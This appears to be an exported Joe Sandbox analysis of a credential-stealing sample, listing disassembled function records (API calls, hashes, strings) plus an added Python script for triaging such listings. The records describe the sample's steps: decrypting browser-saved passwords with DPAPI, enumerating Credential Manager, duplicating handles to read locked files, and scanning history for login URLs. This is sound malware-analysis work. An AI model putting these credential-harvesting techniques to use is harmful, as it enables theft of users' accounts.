                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                • memset.MSVCRT ref: 00445986
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                • API String ID: 2745753283-3798722523
                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
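The function records above give raw API names with hex arguments, and the same decoding work recurs across them: the handle-table scan at 0040DD85 (NtQuerySystemInformation class 0x10, OpenProcess with 0x40, DuplicateHandle, then _wcsicmp against the host names in its String ID), the process walk at 00413D4C (Toolhelp32 snapshot, OpenProcess with 0x410), the resource read at 0040B5A5, the CryptUnprotectData call at 00404423 and the credential-store walk at 0044553B with its CredEnumerateW subcall. The script below is an added example, not part of the Joe Sandbox report and not code from the sample. It parses lines in the report's own "APIs" format (direct calls and "Part of subcall function" lines), decodes the access masks and information classes a triager would otherwise look up by hand, folds the FindCloseChangeNotification label back to CloseHandle (the two exports resolve to the same kernelbase routine, which is why the IDA plugin picks the alias), and tags the capability each API group implies. The sample trace is constructed from lines copied out of the records above; the flag tables and capability labels are my own triage conventions, not Joe Sandbox output.

```python
"""Triage helper for Joe Sandbox "APIs" listings. Added example, not report
output or sample code; flag tables and labels are my own triage conventions."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# The IDA plugin labels CloseHandle calls FindCloseChangeNotification (both
# exports resolve to the same kernelbase routine); fold the alias back.
ALIASES = {"FindCloseChangeNotification": "CloseHandle"}

LINE_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<via>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

# Bit masks decoded per (API, argument index); values are the Win32 constants.
FLAGS = {
    ("OpenProcess", 0): {0x0010: "PROCESS_VM_READ", 0x0040: "PROCESS_DUP_HANDLE",
                         0x0400: "PROCESS_QUERY_INFORMATION"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE"},
}
# Exact-value enumerations per (API, argument index).
ENUMS = {("NtQuerySystemInformation", 0): {0x10: "SystemHandleInformation"},
         ("CreateFileW", 4): {3: "OPEN_EXISTING"}}

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                   # address of the call instruction
    via: Optional[str] = None  # subcall function that made it, if indirect

def as_int(arg: str) -> Optional[int]:
    # Joe prints numbers as 8 hex digits; '?' and string arguments give None.
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None

def parse_trace(text: str) -> List[Call]:
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        args = m.group("args").split(",") if m.group("args") else []
        api = ALIASES.get(m.group("api"), m.group("api"))
        calls.append(Call(api, m.group("mod"), args, m.group("ref"), m.group("via")))
    return calls

def decode_args(call: Call) -> List[str]:
    """Replace known numeric arguments with their symbolic names."""
    out = []
    for i, arg in enumerate(call.args):
        v, key = as_int(arg), (call.api, i)
        if v is not None and key in ENUMS and v in ENUMS[key]:
            out.append(ENUMS[key][v])
        elif v is not None and key in FLAGS:
            names = [name for bit, name in FLAGS[key].items() if v & bit]
            rest = v & ~sum(FLAGS[key])  # bits the table does not cover
            out.append("|".join(names + ([hex(rest)] if rest else [])) or hex(v))
        else:
            out.append(arg)
    return out

def has(calls: List[Call], api: str, idx: Optional[int] = None, value: int = 0) -> bool:
    # True if `api` was called, optionally with argument `idx` equal to `value`.
    return any(c.api == api and (idx is None or
               (idx < len(c.args) and as_int(c.args[idx]) == value)) for c in calls)

# Capability rules: a triage label and the API pattern that justifies it.
RULES: List[Tuple[str, Callable[[List[Call]], bool]]] = [
    ("handle-table scan (SystemHandleInformation + DuplicateHandle)",
     lambda c: has(c, "NtQuerySystemInformation", 0, 0x10) and has(c, "DuplicateHandle")),
    ("process walk (Toolhelp32 snapshot + OpenProcess)",
     lambda c: has(c, "CreateToolhelp32Snapshot") and has(c, "OpenProcess")),
    ("payload read from a PE resource (FindResource + LockResource)",
     lambda c: has(c, "FindResourceW") and has(c, "LockResource")),
    ("DPAPI decryption of stored secrets", lambda c: has(c, "CryptUnprotectData")),
    ("Credential Manager enumeration", lambda c: has(c, "CredEnumerateW")),
]

def capabilities(calls: List[Call]) -> List[str]:
    return [label for label, pred in RULES if pred(calls)]

# Constructed sample: lines copied from the function records above.
SAMPLE_TRACE = """
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
"""

if __name__ == "__main__":
    for c in (calls := parse_trace(SAMPLE_TRACE)):
        where = f"{c.ref} via {c.via}" if c.via else c.ref
        print(f"{where}  {c.api}.{c.module}({','.join(decode_args(c))})")
    print("capabilities:", *capabilities(calls), sep="\n  ")
```

Read against the record at 0040DD85, the decoded output shows the pattern worth a breakpoint: the sample opens its own image (GetModuleFileNameW in the 00409BCA subcall, then CreateFileW with GENERIC_READ and FILE_SHARE_READ|FILE_SHARE_WRITE), walks the system handle table with SystemHandleInformation, opens other processes with PROCESS_DUP_HANDLE, duplicates their handles into itself and string-compares against the host names in its String ID. The 00413D4C walk uses PROCESS_QUERY_INFORMATION|PROCESS_VM_READ instead, which is what QueryFullProcessImageNameW needs. Joe lists more arguments than the API takes (the extra stack slots are call context), so the decoder only names the indices it knows and leaves the rest verbatim.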

Control-flow Graph: not included in this export (rendered only in the interactive report).

                                APIs
                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                • String ID: $/deleteregkey$/savelangfile
                                • API String ID: 2744995895-28296030
                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                • wcsrchr.MSVCRT ref: 0040B738
                                • memset.MSVCRT ref: 0040B756
                                • memset.MSVCRT ref: 0040B7F5
                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                • memset.MSVCRT ref: 0040B851
                                • memset.MSVCRT ref: 0040B8CA
                                • memcmp.MSVCRT ref: 0040B9BF
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                • memset.MSVCRT ref: 0040BB53
                                • memcpy.MSVCRT ref: 0040BB66
                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                • String ID: chp$v10
                                • API String ID: 580435826-2783969131
                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                Control-flow Graph

                                • Graph rendering omitted (basic blocks 004091B8-00409526; calls memset, memcpy, memcmp)
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                • String ID:
                                • API String ID: 3715365532-3916222277
                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                • String ID: bhv
                                • API String ID: 327780389-2689659898
                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                Control-flow Graph

                                • Graph rendering omitted (basic blocks 00413F4F-00413FA5; five GetProcAddress calls)
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2941347001-70141382
                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                Control-flow Graph

                                • Graph rendering omitted (basic blocks 004466F4-004468DD; CRT startup sequence: GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __wgetmainargs, GetStartupInfoW, _cexit, exit)
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                • String ID:
                                • API String ID: 2827331108-0
                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                • wcschr.MSVCRT ref: 0040C324
                                • wcschr.MSVCRT ref: 0040C344
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                • GetLastError.KERNEL32 ref: 0040C373
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                • String ID: visited:
                                • API String ID: 1157525455-1702587658
                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                Control-flow Graph

                                • Graph rendering omitted (basic blocks 0040E175-0040E2A8; calls memset, _snwprintf, ??3@YAXPAX@Z)
                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                • memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                • _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                • API String ID: 3883404497-2982631422
                                • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040BC75
                                • memset.MSVCRT ref: 0040BC8C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                • memcmp.MSVCRT ref: 0040BCD6
                                • memcpy.MSVCRT ref: 0040BD2B
                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                • String ID:
                                • API String ID: 509814883-3916222277
                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                Control-flow Graph

                                • Graph rendering omitted (basic blocks 0041837F-0041851D; calls CreateFileW, CreateFileA, GetLastError, ??3@YAXPAX@Z, memset)
                                APIs
                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                • GetLastError.KERNEL32 ref: 0041847E
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CreateFile$??3@ErrorLast
                                • String ID: |A
                                • API String ID: 1407640353-1717621600
                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                • String ID: r!A
                                • API String ID: 2791114272-628097481
                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                • wcslen.MSVCRT ref: 0040C82C
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                • API String ID: 62308376-4196376884
                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
